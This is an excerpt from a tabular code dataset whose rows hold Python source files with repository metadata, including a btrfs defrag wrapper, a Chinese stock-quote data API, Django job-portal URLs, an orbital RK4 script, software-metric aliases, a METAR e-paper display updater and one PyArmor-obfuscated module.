hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3c3b9d3f39b8361cf623581c59d5c7de855eb076
| 943
|
py
|
Python
|
btrfslime/defrag/btrfs.py
|
tsangwpx/btrfslime
|
49c141721c532706f146fea31d2eb171c6dd698b
|
[
"MIT"
] | 3
|
2020-10-30T12:18:42.000Z
|
2022-02-06T20:17:55.000Z
|
btrfslime/defrag/btrfs.py
|
tsangwpx/btrfslime
|
49c141721c532706f146fea31d2eb171c6dd698b
|
[
"MIT"
] | null | null | null |
btrfslime/defrag/btrfs.py
|
tsangwpx/btrfslime
|
49c141721c532706f146fea31d2eb171c6dd698b
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
import os
import subprocess
from typing import AnyStr
from ..util import check_nonnegative
BTRFS_BIN = '/bin/btrfs'
def file_defrag(
target: AnyStr,
start: int = None,
size: int = None,
extent_size: int = None,
*,
flush=False,
btrfs_bin=BTRFS_BIN,
):
if isinstance(target, bytes):
target = os.fsdecode(target)
defrag_args = [btrfs_bin, 'filesystem', 'defrag']
if start is not None:
check_nonnegative('start', start)
defrag_args.extend(('-s', str(start)))
if size is not None:
check_nonnegative('size', size)
defrag_args.extend(('-l', str(size)))
if extent_size is not None:
check_nonnegative('extent_size', extent_size)
defrag_args.extend(('-t', str(extent_size)))
if flush:
defrag_args.append('-f')
defrag_args.append(os.fspath(target))
subprocess.check_call(defrag_args)
| 21.930233
| 53
| 0.652174
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 74
| 0.078473
|
3c3ddb0feb36d17a1b33c822d86fc630d77ff009
| 14,771
|
py
|
Python
|
fooltrader/api/quote.py
|
lcczz/fooltrader
|
fb43d9b2ab18fb758ca2c629ad5f7ba1ea873a0e
|
[
"MIT"
] | 1
|
2018-04-03T06:25:24.000Z
|
2018-04-03T06:25:24.000Z
|
fooltrader/api/quote.py
|
lcczz/fooltrader
|
fb43d9b2ab18fb758ca2c629ad5f7ba1ea873a0e
|
[
"MIT"
] | null | null | null |
fooltrader/api/quote.py
|
lcczz/fooltrader
|
fb43d9b2ab18fb758ca2c629ad5f7ba1ea873a0e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import datetime
import logging
import os
from ast import literal_eval
import numpy as np
import pandas as pd
from fooltrader.consts import CHINA_STOCK_INDEX, USA_STOCK_INDEX
from fooltrader.contract import data_contract
from fooltrader.contract import files_contract
from fooltrader.contract.files_contract import get_kdata_dir, get_kdata_path
from fooltrader.settings import US_STOCK_CODES
from fooltrader.utils.utils import get_file_name, to_time_str
logger = logging.getLogger(__name__)
def convert_to_list_if_need(input):
if input and "[" in input:
return literal_eval(input)
else:
return input
# meta
def get_security_list(security_type='stock', exchanges=['sh', 'sz'], start=None, end=None,
mode='simple', start_date=None, codes=None):
"""
get security list.
Parameters
----------
security_type : str
{‘stock’, 'future'},default: stock
exchanges : list
['sh', 'sz','nasdaq','nyse','amex'],default: ['sh','sz']
start : str
the start code,default:None
only works when exchanges is ['sh','sz']
end : str
the end code,default:None
only works when exchanges is ['sh','sz']
mode : str
whether parse more security info,{'simple','es'},default:'simple'
start_date : Timestamp str or Timestamp
the filter for start list date,default:None
codes : list
the exact codes to query,default:None
Returns
-------
DataFrame
the security list
"""
if security_type == 'stock':
df = pd.DataFrame()
df_usa = pd.DataFrame()
for exchange in exchanges:
the_path = files_contract.get_security_list_path(security_type, exchange)
if os.path.exists(the_path):
if exchange == 'sh' or exchange == 'sz':
if mode == 'simple':
df1 = pd.read_csv(the_path,
converters={'code': str})
else:
df1 = pd.read_csv(the_path,
converters={'code': str,
'sinaIndustry': convert_to_list_if_need,
'sinaConcept': convert_to_list_if_need,
'sinaArea': convert_to_list_if_need})
df = df.append(df1, ignore_index=True)
elif exchange == 'nasdaq':
df_usa = pd.read_csv(the_path, dtype=str)
elif security_type == 'index':
df = pd.DataFrame(CHINA_STOCK_INDEX)
df_usa = pd.DataFrame()
if 'nasdaq' in exchanges:
df_usa = pd.DataFrame(USA_STOCK_INDEX)
if df.size > 0:
if start:
df = df[df["code"] <= end]
if end:
df = df[df["code"] >= start]
if start_date:
df['listDate'] = pd.to_datetime(df['listDate'])
df = df[df['listDate'] >= pd.Timestamp(start_date)]
df = df.set_index(df['code'], drop=False)
if df_usa.size > 0:
df_usa = df_usa.set_index(df_usa['code'], drop=False)
if codes:
df_usa = df_usa.loc[codes]
df = df.append(df_usa, ignore_index=True)
return df
def _get_security_item(code=None, id=None, the_type='stock'):
"""
get the security item.
Parameters
----------
code : str
the security code,default: None
id : str
the security id,default: None
the_type : str
the security type
Returns
-------
DataFrame
the security item
"""
df = get_security_list(security_type=the_type)
if id:
df = df.set_index(df['id'])
return df.loc[id,]
if code:
df = df.set_index(df['code'])
return df.loc[code,]
def to_security_item(security_item):
if type(security_item) == str:
if 'stock' in security_item:
security_item = _get_security_item(id=security_item, the_type='stock')
elif 'index' in security_item:
security_item = _get_security_item(id=security_item, the_type='index')
else:
security_item = _get_security_item(code=security_item)
return security_item
# tick
def get_ticks(security_item, the_date=None, start=None, end=None):
"""
get the ticks.
Parameters
----------
security_item : SecurityItem or str
the security item,id or code
the_date : TimeStamp str or TimeStamp
get the tick for the exact date
start : TimeStamp str or TimeStamp
start date
end: TimeStamp str or TimeStamp
end date
Yields
-------
DataFrame
"""
security_item = to_security_item(security_item)
if the_date:
tick_path = files_contract.get_tick_path(security_item, the_date)
yield _parse_tick(tick_path, security_item)
else:
tick_dir = files_contract.get_tick_dir(security_item)
if start or end:
if not start:
start = security_item['listDate']
if not end:
end = datetime.datetime.today()
tick_paths = [os.path.join(tick_dir, f) for f in
os.listdir(tick_dir) if
get_file_name(f) in pd.date_range(start=start, end=end)]
else:
tick_paths = [os.path.join(tick_dir, f) for f in
os.listdir(tick_dir)]
for tick_path in sorted(tick_paths):
yield _parse_tick(tick_path, security_item)
def _parse_tick(tick_path, security_item):
if os.path.isfile(tick_path):
df = pd.read_csv(tick_path)
df['timestamp'] = get_file_name(tick_path) + " " + df['timestamp']
df = df.set_index(df['timestamp'], drop=False)
df.index = pd.to_datetime(df.index)
df = df.sort_index()
df['code'] = security_item['code']
df['securityId'] = security_item['id']
return df
def get_available_tick_dates(security_item):
dir = files_contract.get_tick_dir(security_item)
return [get_file_name(f) for f in os.listdir(dir)]
# kdata
def get_kdata(security_item, the_date=None, start_date=None, end_date=None, fuquan='bfq', dtype=None, source='163',
level='day'):
"""
get kdata.
Parameters
----------
security_item : SecurityItem or str
the security item,id or code
the_date : TimeStamp str or TimeStamp
get the kdata for the exact date
start_date : TimeStamp str or TimeStamp
start date
end_date : TimeStamp str or TimeStamp
end date
fuquan : str
{"qfq","hfq","bfq"},default:"bfq"
dtype : type
the data type for the csv column,default: None
source : str
the data source,{'163','sina'},default: '163'
level : str or int
the kdata level,{1,5,15,30,60,'day','week','month'},default : 'day'
Returns
-------
DataFrame
"""
security_item = to_security_item(security_item)
# 163的数据是合并过的,有复权因子,都存在'bfq'目录下,只需从一个地方取数据,并做相应转换
if source == '163':
the_path = files_contract.get_kdata_path(security_item, source=source, fuquan='bfq')
else:
the_path = files_contract.get_kdata_path(security_item, source=source, fuquan=fuquan)
if os.path.isfile(the_path):
if not dtype:
dtype = {"code": str, 'timestamp': str}
df = pd.read_csv(the_path, dtype=dtype)
df.timestamp = df.timestamp.apply(lambda x: to_time_str(x))
df = df.set_index(df['timestamp'], drop=False)
df.index = pd.to_datetime(df.index)
df = df.sort_index()
if the_date:
if the_date in df.index:
return df.loc[the_date]
else:
return pd.DataFrame()
if not start_date:
if security_item['type'] == 'stock':
if type(security_item['listDate']) != str and np.isnan(security_item['listDate']):
start_date = '2002-01-01'
else:
start_date = security_item['listDate']
else:
start_date = datetime.datetime.today() - datetime.timedelta(days=30)
if not end_date:
end_date = datetime.datetime.today()
if start_date and end_date:
df = df.loc[start_date:end_date]
#
if source == '163' and security_item['type'] == 'stock':
if fuquan == 'bfq':
return df
if 'factor' in df.columns:
current_factor = df.tail(1).factor.iat[0]
# 后复权是不变的
df.close *= df.factor
df.open *= df.factor
df.high *= df.factor
df.low *= df.factor
if fuquan == 'qfq':
# 前复权需要根据最新的factor往回算
df.close /= current_factor
df.open /= current_factor
df.high /= current_factor
df.low /= current_factor
return df
return pd.DataFrame()
def get_latest_download_trading_date(security_item, return_next=True, source='163'):
df = get_kdata(security_item, source=source)
if len(df) == 0:
return pd.Timestamp(security_item['listDate'])
if return_next:
return df.index[-1] + pd.DateOffset(1)
else:
return df.index[-1]
def get_trading_dates(security_item, dtype='list', ignore_today=False, source='163', fuquan='bfq'):
df = get_kdata(security_item, source=source, fuquan=fuquan)
if dtype is 'list' and len(df.index) > 0:
dates = df.index.strftime('%Y-%m-%d').tolist()
if ignore_today:
dates = [the_date for the_date in dates if the_date != datetime.datetime.today().strftime('%Y-%m-%d')]
return dates
return dates
return df.index
def kdata_exist(security_item, year, quarter, fuquan=None, source='163'):
df = get_kdata(security_item, fuquan=fuquan, source=source)
if "{}Q{}".format(year, quarter) in df.index:
return True
return False
# TODO:use join
def merge_to_current_kdata(security_item, df, fuquan='bfq'):
df = df.set_index(df['timestamp'], drop=False)
df.index = pd.to_datetime(df.index)
df = df.sort_index()
df1 = get_kdata(security_item, source='sina', fuquan=fuquan, dtype=str)
df1 = df1.append(df)
df1 = df1.drop_duplicates(subset='timestamp', keep='last')
df1 = df1.sort_index()
the_path = files_contract.get_kdata_path(security_item, source='sina', fuquan=fuquan)
df1.to_csv(the_path, index=False)
def time_index_df(df):
df = df.set_index(df['timestamp'])
df.index = pd.to_datetime(df.index)
df = df.sort_index()
return df
def add_factor_to_163(security_item):
path_163 = get_kdata_path(security_item, source='163', fuquan='bfq')
df_163 = pd.read_csv(path_163, dtype=str)
df_163 = time_index_df(df_163)
if 'factor' in df_163.columns:
df = df_163[df_163['factor'].isna()]
if df.empty:
logger.info("{} 163 factor is ok", security_item['code'])
return
path_sina = get_kdata_path(security_item, source='sina', fuquan='hfq')
df_sina = pd.read_csv(path_sina, dtype=str)
df_sina = time_index_df(df_sina)
df_163['factor'] = df_sina['factor']
df_163.to_csv(path_163, index=False)
def merge_kdata_to_one(security_item=None, replace=False, fuquan='bfq'):
if type(security_item) != 'NoneType':
items = pd.DataFrame().append(security_item).iterrows()
else:
items = get_security_list().iterrows()
if fuquan:
fuquans = [fuquan]
else:
fuquans = ['bfq', 'hfq']
for index, security_item in items:
for fuquan in fuquans:
dayk_path = get_kdata_path(security_item, source='sina', fuquan=fuquan)
if fuquan == 'hfq':
df = pd.DataFrame(
columns=data_contract.KDATA_COLUMN_FQ)
else:
df = pd.DataFrame(
columns=data_contract.KDATA_COLUMN)
the_dir = get_kdata_dir(security_item, fuquan=fuquan)
if os.path.exists(the_dir):
files = [os.path.join(the_dir, f) for f in os.listdir(the_dir) if
('dayk.csv' not in f and os.path.isfile(os.path.join(the_dir, f)))]
for f in files:
df = df.append(pd.read_csv(f, dtype=str), ignore_index=True)
if df.size > 0:
df = df.set_index(df['timestamp'])
df.index = pd.to_datetime(df.index)
df = df.sort_index()
logger.info("{} to {}".format(security_item['code'], dayk_path))
if replace:
df.to_csv(dayk_path, index=False)
else:
merge_to_current_kdata(security_item, df, fuquan=fuquan)
for f in files:
logger.info("remove {}".format(f))
os.remove(f)
if fuquan == 'hfq':
add_factor_to_163(security_item)
if __name__ == '__main__':
print(get_security_list(security_type='stock', exchanges=['nasdaq'], codes=US_STOCK_CODES))
# item = {"code": "000001", "type": "stock", "exchange": "sz"}
# assert kdata_exist(item, 1991, 2) == True
# assert kdata_exist(item, 1991, 3) == True
# assert kdata_exist(item, 1991, 4) == True
# assert kdata_exist(item, 1991, 2) == True
# assert kdata_exist(item, 1990, 1) == False
# assert kdata_exist(item, 2017, 1) == False
#
# df1 = get_kdata(item,
# datetime.datetime.strptime('1991-04-01', settings.TIME_FORMAT_DAY),
# datetime.datetime.strptime('1991-12-31', settings.TIME_FORMAT_DAY))
# df1 = df1.set_index(df1['timestamp'])
# df1 = df1.sort_index()
# print(df1)
#
# df2 = tdx.get_tdx_kdata(item, '1991-04-01', '1991-12-31')
# df2 = df2.set_index(df2['timestamp'], drop=False)
# df2 = df2.sort_index()
# print(df2)
#
# for _, data in df1.iterrows():
# if data['timestamp'] in df2.index:
# data2 = df2.loc[data['timestamp']]
# assert data2["low"] == data["low"]
# assert data2["open"] == data["open"]
# assert data2["high"] == data["high"]
# assert data2["close"] == data["close"]
# assert data2["volume"] == data["volume"]
# try:
# assert data2["turnover"] == data["turnover"]
# except Exception as e:
# print(data2["turnover"])
# print(data["turnover"])
| 32.89755
| 115
| 0.580326
| 0
| 0
| 1,302
| 0.087471
| 0
| 0
| 0
| 0
| 4,343
| 0.29177
|
3c3f46d21ba0b951765c196ff37b42684f836343
| 432
|
py
|
Python
|
backend/jobPortal/api/urls.py
|
KshitijDarekar/hackViolet22
|
c54636d3044e1d9a7d8fa92a4d781e79f38af3ca
|
[
"MIT"
] | 2
|
2022-02-06T04:58:24.000Z
|
2022-02-06T05:31:18.000Z
|
backend/jobPortal/api/urls.py
|
KshitijDarekar/hackViolet22
|
c54636d3044e1d9a7d8fa92a4d781e79f38af3ca
|
[
"MIT"
] | 5
|
2022-02-06T05:08:04.000Z
|
2022-02-06T16:29:51.000Z
|
backend/jobPortal/api/urls.py
|
KshitijDarekar/hackViolet22
|
c54636d3044e1d9a7d8fa92a4d781e79f38af3ca
|
[
"MIT"
] | 2
|
2022-02-06T04:58:43.000Z
|
2022-02-06T17:56:23.000Z
|
from django.urls import path
from . import views
# Refer to the corresponding view function for more detials of the url routes
urlpatterns = [
path('', views.getRoutes, name="index"),
path('add/', views.addJob, name="addJob" ),
path('delete/<int:id>', views.removeJob, name="removeJob" ),
path('get-jobs/', views.getJobs, name='getJobs'),
path('company/jobs/', views.getCompanyJobs, name='getCompanyJobs'),
]
| 33.230769
| 77
| 0.685185
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 179
| 0.414352
|
3c4027e0a85dd326115e24d1e6e1369d17bbdebc
| 3,135
|
py
|
Python
|
rh_project/pick_six.py
|
hrichstein/phys_50733
|
a333bfa4dd5b0ca464bd861336bc2f32d8e72a2b
|
[
"MIT"
] | null | null | null |
rh_project/pick_six.py
|
hrichstein/phys_50733
|
a333bfa4dd5b0ca464bd861336bc2f32d8e72a2b
|
[
"MIT"
] | null | null | null |
rh_project/pick_six.py
|
hrichstein/phys_50733
|
a333bfa4dd5b0ca464bd861336bc2f32d8e72a2b
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
# from scipy.constants import G
# Setting plotting parameters
from matplotlib import rc,rcParams
rc('text', usetex=True)
rc('axes', linewidth=2)
rc('font', weight='bold')
rc('font', **{'family': 'serif', 'serif':['Computer Modern']})
def find_vel_init(M1, M2, a):
period = np.sqrt(4 * np.pi**2 * a**3 / G / (M1 + M2)) # period in days
print("Period is {0:.3f} years".format(period))
v = 2 * np.pi * a / period # AU/year
print(v)
return v
# def rk4_func(params):
# s1, s2, p, vs1, vs2, vp = params
# s1x, s1y = s1
# s2x, s2y = s2
# px, py = p
# # s1_vx, s1_vy = vs1
# # s2_vx, s2_vy = vs2
# # p_vx, p_vy = vp
# a1x = -G * red_mass * 0.1 / np.sqrt(0.1)**3
# a1y = -G * red_mass * 0 / np.sqrt(0.1)**3
# # R1px = abs(s1x - px)
# # R1py = abs(s1y - py)
# # R2px = abs(s2x - px)
# # R2py = abs(s2y - py)
# # R12x = abs(s1x - s2x)
# # R12y = abs(s1y - s2y)
# # R1p = np.sqrt((s1x - px)**2 + (s1y - py)*2)
# # R2p = np.sqrt((s2x - px)**2 + (s2y - py)*2)
# # R12 = A # global variable
# # a1_2x = -G * M1 * R12x / R12**3
# # a1_2y = -G * M1 * R12y / R12**3
# # a2_1x = -G * M2 * R12x
def ghetto(arr):
x, y, vx, vy = arr
ax = -G * red_mass * x / np.sqrt(x**2 + y**2)**3
# ax += -G * M1 *
ay = -G * red_mass * y / np.sqrt(x**2 + y**2)**3
ac_arr = np.array([ax, ay], float)
# print(x)
return np.array([vx, vy, ax, ay])
# Constants
G = 4 * np.pi**2 # AU^3 yr^-2 M_sun^-1
A = 0.2 # AU
r = A/2 # semi-major axis & radius
test_plan = 1 # AU
a = 0
b = .02
N = 100000
h = (b-a)/N
M1 = 1
M2 = 1
red_mass = M1*M2/(M1+M2)
tpoints = np.arange(a, b, h, dtype=int)
s1 = np.array([r, 0], float)
s2 = np.array([-r,0], float)
p = np.array([test_plan, 0], float)
s_vel = find_vel_init(M1, red_mass, r)
# s_vel = np.sqrt(10*G*red_mass)
p_vel = find_vel_init(red_mass, 0, test_plan)
print(s_vel)
s1_v0 = np.array([0, s_vel], float)
s2_v0 = np.array([0, -s_vel], float)
p_v0 = np.array([0, p_vel], float)
all_params = np.array([s1, s2, p, s1_v0, s2_v0, p_v0])
xpts_s1 = [[] for tt in range(len(tpoints))]
ypts_s1 = [[] for tt in range(len(tpoints))]
xpts_s2 = [[] for tt in range(len(tpoints))]
ypts_s2 = [[] for tt in range(len(tpoints))]
xpts_p = [[] for tt in range(len(tpoints))]
ypts_p = [[] for tt in range(len(tpoints))]
s_ghet = np.array([s1[0], s1[1], s1_v0[0], s1_v0[1]])
for tt in range(len(tpoints)):
xpts_s1[tt] = s_ghet[0]
ypts_s1[tt] = s_ghet[1]
k1 = h * ghetto(s_ghet)
k2 = h * ghetto(s_ghet + 0.5*k1)
k3 = h * ghetto(s_ghet + 0.5*k2)
k4 = h * ghetto(s_ghet + k3)
s_ghet += (k1 + 2*k2 + 2*k3 + k4) / 6
# print(s_ghet[0])
plt.plot(xpts_s1, ypts_s1)
plt.show()
# def f(s,t):
# x, y, vx, vy = s
# R = np.sqrt(x**2 + y**2)
# ax = (-GMsun * x )/R ** 3
# ay = (-GMsun * y )/R ** 3
# return np.array([vx, vy, ax, ay])
# r0 = np.array([r, 0.0], float)
# v0 = np.array([0, -s_vel], float)
# s = np.array([r0[0], r0[1], v0[0], v0[1]])
# for tt in :
# solution[j] = s
# k1 = h*f(s,t)
# k2 = h*f(s+0.5*k1,t+0.5*h)
# k3 = h*f(s+0.5*k2,t+0.5*h)
# k4 = h*f(s+k3,t+h)
# s += (k1+2*k2+2*k3+k4)/6
| 19.59375
| 71
| 0.551515
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,380
| 0.440191
|
3c42036c78c029c70b9f27f5eeeede981c311ba5
| 1,704
|
py
|
Python
|
recoda/analyse/python/metrics.py
|
hansendx/recoda
|
09e25843376613b17c6b42d45e30b895b24a7d9d
|
[
"MIT"
] | null | null | null |
recoda/analyse/python/metrics.py
|
hansendx/recoda
|
09e25843376613b17c6b42d45e30b895b24a7d9d
|
[
"MIT"
] | null | null | null |
recoda/analyse/python/metrics.py
|
hansendx/recoda
|
09e25843376613b17c6b42d45e30b895b24a7d9d
|
[
"MIT"
] | null | null | null |
""" Provides functionality to calculate software metrics in python projects.
"""
from recoda.analyse.python import (
_general,
_installability,
_understandability,
_verifiability,
_correctness,
)
from recoda.analyse.independent import (
learnability,
openness
)
# pylint: disable-msg=c0103
# For now this seems to be the most streamline method of decentralization
# of this module. We want to call all functions via the metrics but we do
# not want it to be too long and unreadable. Wrapping the private module
# functions into a barebones would just lead to a lot more unnecessary code.
# Installability related metrics.
#packageability = _installability.packageability
packageability = _installability.packageability
requirements_declared = _installability.requirements_declared
docker_setup = _installability.docker_setup
singularity_setup = _installability.singularity_setup
# Learnability related metrics.
project_readme_size = learnability.project_readme_size
project_doc_size = learnability.project_doc_size
flesch_reading_ease = learnability.flesch_reading_ease
flesch_kincaid_grade = learnability.flesch_kincaid_grade
readme_flesch_reading_ease = learnability.readme_flesch_reading_ease
readme_flesch_kincaid_grade = learnability.readme_flesch_kincaid_grade
# Understandability related metrics.
average_comment_density = _understandability.average_comment_density
standard_compliance = _understandability.standard_compliance
# Openness related metrics.
license_type = openness.license_type
testlibrary_usage = _verifiability.testlibrary_usage
# Correctness related metrics.
error_density = _correctness.error_density
# General
loc = _general.count_loc
| 29.894737
| 76
| 0.834507
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 615
| 0.360915
|
3c42183d7ca6ff665b6de8859306ffa82f1f09f2
| 1,667
|
py
|
Python
|
legacy/functional_code/pulson440/__init__.py
|
jjimmykang/bwsi-backprojection
|
440e21f90e2a1d0d1c28bfd9a0faaf97129378a5
|
[
"MIT"
] | 1
|
2020-02-09T19:09:27.000Z
|
2020-02-09T19:09:27.000Z
|
legacy/functional_code/pulson440/__init__.py
|
jjimmykang/bwsi-backprojection
|
440e21f90e2a1d0d1c28bfd9a0faaf97129378a5
|
[
"MIT"
] | null | null | null |
legacy/functional_code/pulson440/__init__.py
|
jjimmykang/bwsi-backprojection
|
440e21f90e2a1d0d1c28bfd9a0faaf97129378a5
|
[
"MIT"
] | null | null | null |
__pyarmor__(__name__, __file__, b'\xe2\x50\x8c\x64\x26\x42\xd6\x01\x5c\x5c\xf8\xa8\x85\x0c\x21\xe7\x0a\xa2\x45\x58\x6e\xc9\x3c\xd5\x55\x40\x64\x69\x7d\x5f\x63\xcb\x41\xdc\x71\xdf\x4d\x82\x99\xc8\xc1\x98\xfd\x46\x67\x20\x2f\xed\x4b\xf6\xf9\x41\x55\x5c\x47\x3c\x78\x07\x75\x5d\x9b\x88\xa2\x6e\x5e\x78\xf3\x9c\x88\xba\xed\x07\xab\xfe\x63\x70\x5d\x62\xc4\xbe\xfd\x5d\x4c\x32\x27\x59\x91\x67\x1e\xb0\x09\xec\x0b\x12\x11\x95\xce\xb2\xee\x37\xe2\x0e\x96\xb7\x83\x5e\x28\x3a\xde\x3f\xd7\xea\x21\x4b\xeb\x6e\x65\x36\x4c\x34\x8b\xd6\x28\x44\x50\x1e\xd0\xe8\x0b\xd9\x61\x73\x2c\xb2\x29\xf7\x42\xb4\x2e\x08\x97\x23\xd0\xd3\x76\xcf\xf0\xe9\xb7\x3c\x9e\xc4\x57\xc6\xab\x9f\xbb\xbb\x63\xc3\x80\xf3\x9d\x1e\x6d\x3c\xaf\x91\x80\x55\xbb\xc8\xa2\x26\x03\x92\xdd\x15\x99\x70\x84\xc0\xcd\x34\xcf\x1f\x23\xea\xba\xad\x7a\x1e\xe1\xb6\x93\xed\x61\xa7\xf2\x15\x58\x20\x19\x08\xca\x8c\x31\x89\x05\x52\x81\xde\xfa\x76\x9a\xa3\x91\x5b\x25\xb8\x2b\xd0\x4f\xfb\x4a\x92\x15\x71\x4f\x8e\xf2\x6e\xe8\xdb\x23\xb4\x9f\xee\x94\xd0\x7a\x58\xeb\x22\xb7\x25\x08\xac\x2e\xf9\xa1\x0c\x37\xc5\xe8\x58\xe6\x26\xaf\x21\xce\x28\x4c\xdf\x09\xdc\xf8\xd7\x78\xe5\xc2\xb7\x32\x78\x09\x03\xf7\x28\x4f\x25\xc6\xe8\x87\x28\xef\x7a\x84\x1b\x88\x23\x5d\xf4\x6c\xf4\x0c\xa2\x02\x3b\x2e\x56\x30\xcd\x24\xff\x8f\xb8\xb0\x7c\x7c\x2e\x84\x60\x13\x25\xfe\xcc\x1b\x2d\xa3\xe1\xe2\x45\xff\x3f\x0b\xfe\xca\x49\x50\xbd\x3d\x64\x8e\xb5\xe9\x62\xcf\xaf\xb7\x99\x80\x7a\xfc\xdf\x31\x65\xf1\x24\xd9\xec\x50\xd9\x7f\xd0\xf6\x4a\xcd\xfc\x3d\x7e\xfd\xf8\x3c\xd5\x16\xfe\x8a\x68\xb7\xf3\xf2\x13\x1d\xa9\x91\x9a\x51\x8e\xc0\xa5\x81\x04\xd6\x08\x90\xf1\xcd\x69\x01\x2b\xd5\x29\xe3\x4e\x7b\x16\x4a\xf6\x61\xd8\x1f\xde\x87\xb2\x40\x8d\x68', 1)
| 1,667
| 1,667
| 0.74985
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,631
| 0.978404
|
3c43222bbb55fdc6b4f2d6c2fab0d2b77fcb11ea
| 3,278
|
py
|
Python
|
metarmap/commands/display.py
|
wastrachan/metarmap
|
2ff9bc3e94d731b83470c2283bfb67600143d719
|
[
"MIT"
] | null | null | null |
metarmap/commands/display.py
|
wastrachan/metarmap
|
2ff9bc3e94d731b83470c2283bfb67600143d719
|
[
"MIT"
] | null | null | null |
metarmap/commands/display.py
|
wastrachan/metarmap
|
2ff9bc3e94d731b83470c2283bfb67600143d719
|
[
"MIT"
] | null | null | null |
import datetime
import os
import textwrap
import click
from PIL import Image, ImageDraw, ImageFont
from metarmap.configuration import config, debug, get_display_lock_content, set_display_lock_content
from metarmap.libraries.aviationweather import metar
from metarmap.libraries.waveshare_epd import epd2in13_V2
FONTDIR = os.path.abspath('/usr/share/fonts/truetype/freefont/')
FONT = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSans.ttf'), 13)
FONT_BOLD = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSansBold.ttf'), 13)
FONT_TITLE = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSans.ttf'), 15)
FONT_TITLE_BOLD = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSansBold.ttf'), 15)
@click.command()
def clear_display():
""" Clear the ePaper display """
debug('Clear e-paper display')
epd = epd2in13_V2.EPD()
epd.init(epd.FULL_UPDATE)
epd.Clear(0xFF)
@click.command()
def update_display():
""" Update the ePaper display with current METAR observation """
# Fetch Observation
station = config['SCREEN'].get('airport', None)
debug(f'Selected airport for e-paper display: {station}')
if not station:
return
try:
observation = metar.retrieve([station, ])[0]
debug(f'Fetched latest weather for station {station}')
except IndexError:
debug(f'Weather not found for station {station}')
return
# Convert observation time to local (system) timezone
timezone = datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo
timezone_name = datetime.datetime.now(datetime.timezone.utc).astimezone().tzname()
observation_time_local = observation.get('observation_time').astimezone(timezone)
# Test observation_time, do not update display if weather observation is not new
new_lock = f'{station}{observation.get("observation_time")}'
old_lock = get_display_lock_content()
if new_lock == old_lock:
debug(f'New weather {new_lock} is the same as old weather {old_lock}. Not updating e-ink display')
return
debug(f'New weather {new_lock} supersedes old weather {old_lock}. Saving in lockfile.')
set_display_lock_content(new_lock)
# Initialize Display
debug('Initialize e-paper display')
epd = epd2in13_V2.EPD()
display_width = epd.height
display_height = epd.width
epd.init(epd.FULL_UPDATE)
image = Image.new('1', (display_width, display_height), 255) # 255: clear the frame
draw = ImageDraw.Draw(image)
# Title
debug('Draw title on e-paper display')
draw.rectangle(((0, 0), (display_width / 2, 22)), fill=0)
draw.text((2, 0), f'METAR {station}', font=FONT_TITLE_BOLD, fill=255)
msg = observation_time_local.strftime('%m/%d/%y %H:%M') + timezone_name[0]
w, h = FONT_TITLE.getsize(msg)
draw.text(((display_width - w - 2), 0), msg, font=FONT_TITLE)
draw.line(((0, 22), (display_width, 22)), fill=0, width=1)
# METAR Text
debug('Write raw METAR text to e-paper display')
line_pos = 40
msg = observation.get('raw_text')
w, h = FONT.getsize(msg)
for line in textwrap.wrap(msg, width=34):
draw.text((0, line_pos), line, font=FONT)
line_pos += h + 3
debug('Flush buffered image to e-paper display')
epd.display(epd.getbuffer(image))
| 38.116279
| 106
| 0.701647
| 0
| 0
| 0
| 0
| 2,588
| 0.789506
| 0
| 0
| 1,015
| 0.30964
|
3c4462f1e63b1c59a4923c8fbfbe9795c85ccd1c
| 3,234
|
py
|
Python
|
electionleaflets/apps/leaflets/views.py
|
electionleaflets/electionleaflets
|
4110e96a3035c32d0b6ff3c9f832c5e003728170
|
[
"MIT"
] | null | null | null |
electionleaflets/apps/leaflets/views.py
|
electionleaflets/electionleaflets
|
4110e96a3035c32d0b6ff3c9f832c5e003728170
|
[
"MIT"
] | 23
|
2015-02-19T14:02:23.000Z
|
2015-04-30T11:14:01.000Z
|
electionleaflets/apps/leaflets/views.py
|
electionleaflets/electionleaflets
|
4110e96a3035c32d0b6ff3c9f832c5e003728170
|
[
"MIT"
] | 2
|
2015-02-02T19:39:54.000Z
|
